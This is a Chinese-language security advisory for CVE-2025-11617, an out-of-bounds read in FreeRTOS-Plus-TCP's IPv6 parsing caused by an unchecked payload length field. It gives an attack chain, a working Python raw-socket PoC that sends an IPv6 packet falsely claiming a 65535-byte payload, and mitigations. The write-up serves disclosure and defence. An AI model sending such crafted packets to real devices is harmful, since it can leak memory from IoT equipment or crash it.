CVE-2025-11617：FreeRTOS-Plus-TCP IPv6数据包处理越界读取漏洞

漏洞信息

漏洞编号

CVE-2025-11617

漏洞类型

越界读取（Out-of-Bounds Read）

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

FreeRTOS-Plus-TCP

漏洞概述

CVE-2025-11617是FreeRTOS-Plus-TCP库中IPv6数据包处理代码存在的一个安全漏洞。该漏洞源于IPv6数据包处理过程中缺少对载荷长度的验证检查。当系统接收到一个IPv6数据包，且该数据包头中声明的载荷长度（Payload Length）字段值与实际数据不匹配时，解析代码会基于错误的长度信息进行内存读取操作，从而导致越界读取（Out-of-Bounds Read）问题。

FreeRTOS-Plus-TCP是AWS维护的一款面向FreeRTOS操作系统的TCP/IP协议栈实现，广泛应用于物联网（IoT）嵌入式设备中。该漏洞仅影响使用IPv6协议栈的应用程序，使用纯IPv4的应用不受影响。根据CVSS 3.1评分标准，该漏洞评分为5.4分，属于中危级别。攻击者可以通过网络远程发送特制的IPv6数据包来触发该漏洞，需要低权限认证，但无需用户交互即可利用。

该漏洞的成功利用可能导致有限的信息泄露和系统可用性降低。虽然完整性影响为无，但越界读取可能导致敏感内存信息泄露，或在某些情况下引发系统崩溃（DoS）。鉴于FreeRTOS-Plus-TCP广泛应用于嵌入式IoT设备，该漏洞的影响范围可能涉及大量物联网终端产品。AWS已发布相应的安全公告（AWS-2025-023），建议用户尽快升级到修复版本V4.3.4。

技术细节

该漏洞的根本原因在于FreeRTOS-Plus-TCP的IPv6数据包解析代码中缺少对IPv6头部载荷长度字段的合法性验证。

IPv6数据包头部格式中包含一个16位的载荷长度（Payload Length）字段，用于指示IPv6头部之后的数据长度。正常的IPv6协议栈在解析数据包时，应当验证该字段值是否与实际接收到的数据长度一致。然而，在存在漏洞的FreeRTOS-Plus-TCP版本中，解析代码直接信任头部中声明的载荷长度值，未进行边界检查。

攻击利用方式如下：
1. 攻击者构造一个特制的IPv6数据包，在IPv6头部中将Payload Length字段设置为超出实际数据包长度的值；
2. 该数据包通过网络发送到目标设备；
3. 目标设备的FreeRTOS-Plus-TCP协议栈接收数据包后，根据头部中错误的载荷长度进行内存读取；
4. 由于读取长度超出实际分配的数据缓冲区范围，导致越界读取发生；
5. 越界读取的内容可能包含相邻内存中的敏感数据，或触发内存访问异常导致系统崩溃。

由于该漏洞的攻击向量为网络（AV:N），且无需用户交互（UI:N），攻击者可以在远程通过网络直接发送恶意数据包来触发漏洞。需要注意的是，利用该漏洞需要低权限（PR:L），意味着攻击者需要某种形式的网络访问权限（如连接到目标网络或已经位于同一网段）。

攻击链分析

STEP 1

步骤1：定位目标

攻击者扫描网络中的物联网设备，识别运行FreeRTOS-Plus-TCP且启用了IPv6协议栈的目标设备。

STEP 2

步骤2：构造恶意数据包

攻击者构造一个IPv6数据包，在IPv6头部的Payload Length字段中填入超出实际数据长度的值（如设置为65535），但实际载荷数据很小。

STEP 3

步骤3：发送恶意数据包

攻击者通过网络将特制的IPv6数据包发送到目标设备，利用IPv6协议的邻居发现或直接路由到达目标。

STEP 4

步骤4：触发越界读取

目标设备的FreeRTOS-Plus-TCP协议栈接收数据包后，在解析IPv6头部时信任Payload Length字段的值，基于该错误长度进行内存读取，导致越界读取发生。

STEP 5

步骤5：信息泄露或服务中断

越界读取可能导致相邻内存中的敏感数据泄露，或因内存访问异常导致系统崩溃，造成拒绝服务（DoS）攻击效果。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11617 PoC - FreeRTOS-Plus-TCP IPv6 OOB Read
# This PoC demonstrates crafting a malicious IPv6 packet with incorrect payload length
# to trigger out-of-bounds read in FreeRTOS-Plus-TCP IPv6 processing code.

import socket
import struct

def craft_malicious_ipv6_packet(target_ip="fe80::1"):
    """
    Craft an IPv6 packet with an oversized payload length field
    to trigger OOB read in vulnerable FreeRTOS-Plus-TCP versions.
    """
    # IPv6 Header format:
    # Version (4 bits) | Traffic Class (8 bits) | Flow Label (20 bits)
    # Payload Length (16 bits) | Next Header (8 bits) | Hop Limit (8 bits)
    # Source Address (128 bits)
    # Destination Address (128 bits)

    version_tc_fl = 0x60000000  # Version 6, TC=0, Flow Label=0
    actual_payload_len = 8      # Actual payload is only 8 bytes
    malicious_payload_len = 65535  # Claimed payload length is maximum (OOB trigger)
    next_header = 59            # No next header (ICMPv6=58, TCP=6, UDP=17)
    hop_limit = 64

    src_addr = socket.inet_pton(socket.AF_INET6, "fe80::2")
    dst_addr = socket.inet_pton(socket.AF_INET6, target_ip)

    # Build IPv6 header with malicious payload length
    ipv6_header = struct.pack(
        "!IHBB",
        version_tc_fl | (malicious_payload_len & 0xFFFF),
        0,  # Upper part combined above
        next_header,
        hop_limit
    )
    # Note: struct packing adjusted for proper header layout
    ipv6_header = struct.pack(
        "!IHBB16s16s",
        version_tc_fl,
        malicious_payload_len,
        next_header,
        hop_limit,
        src_addr,
        dst_addr
    )

    # Actual small payload (only 8 bytes)
    payload = b"\x41" * actual_payload_len

    # Create raw socket and send
    try:
        sock = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW)
        sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_HDRINCL, 1)
        sock.sendto(ipv6_header + payload, (target_ip, 0))
        print(f"[*] Malicious IPv6 packet sent to {target_ip}")
        print(f"[*] Claimed payload length: {malicious_payload_len}")
        print(f"[*] Actual payload length: {actual_payload_len}")
    except PermissionError:
        print("[!] Need root/admin privileges to send raw IPv6 packets")
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    craft_malicious_ipv6_packet()

影响范围

FreeRTOS-Plus-TCP < V4.3.4

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）在网络层面禁用IPv6协议，仅使用IPv4通信，可避免触发该漏洞；2）在防火墙中部署规则，过滤异常的IPv6数据包，特别是载荷长度字段与实际数据包大小不匹配的包；3）通过网络分段和访问控制列表（ACL）限制对运行FreeRTOS-Plus-TCP设备的网络访问，仅允许可信源IP进行通信；4）监控网络流量，检测异常的IPv6数据包模式，及时发现潜在攻击行为。